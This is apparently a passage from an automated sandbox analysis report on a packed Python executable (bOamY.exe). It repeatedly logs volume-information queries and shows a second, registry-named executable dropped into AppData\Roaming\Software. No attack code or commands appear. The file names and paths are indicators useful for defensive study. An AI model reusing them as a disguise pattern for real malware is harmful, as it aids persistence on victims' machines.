Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer\md.cp38-win_amd64.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer\md__mypyc.cp38-win_amd64.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\unicodedata.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\certifi\cacert.pem VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\_asyncio.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\_overlapped.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\lockfile VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\certifi VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\ucrtbase.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
